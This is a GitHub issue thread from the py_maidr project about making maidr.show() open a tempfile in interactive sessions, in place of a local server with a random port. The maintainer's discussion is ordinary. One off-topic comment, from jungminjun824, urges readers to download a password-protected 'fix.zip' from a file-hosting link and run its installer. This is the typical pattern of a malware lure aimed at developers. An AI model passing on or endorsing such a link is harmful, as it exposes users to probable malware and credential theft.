### ISSUE TITLE
refactor(maidr.show): use a tempfile instead of a local server in an interactive session

### ISSUE THREAD

**Issue by jooyoungseo** [xability/py_maidr#103]
## Current Issue

The default behavior of `maidr.show()` is serving an HTML content in a local server with a random port number. This depends on `htmltools.show()`.

However, serving our static content in a local server is an overkill and unnecessary. The random port assignment causes some issues like [#76](https://github.com/xability/py_maidr/issues/76)76.

Unless we need to keep watching the figure updates, we need to use a lightweight solution. For example, we can use a tempfile instead of a local server in an interactive session.

Even if we want to watch the figure updates, the current `thmltools.show()` shuts down the server right after displaying the content. Thus, there is no reason for us to use a local server for the current purpose.

Then, why do we need to use `hmlttools`? Quarto, Shiny, and R Markdown, all of which we need to support for reproducibility depends on this package. So, I will not remove the dependency on `htmltools`.

## solutions

1. Check if the current session is interactive.

1. If interactive, `save_html()` as a  tempfile, and open it with the default browser.

1. If not interactive, use `htmltools.show()` as it is.

**Comment by jungminjun824** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jooyoungseo** [comment]
Plotly also uses tempfile when executed within repl.

**Comment by jooyoungseo** [comment]
@SaaiVenkat @dakshpokar -- I have a fundamental question. Do we even need a server since our maidr plot is self-contained/static assets? Do we have a clear reason why we need to keep the server running? Jupyter Notebook and Shiny run the server so we don't need to care about it. For Python and ipython console, it doesn't seem like we need the server. Even we add an update plot method later, can't we just create and reopen a new temp file?
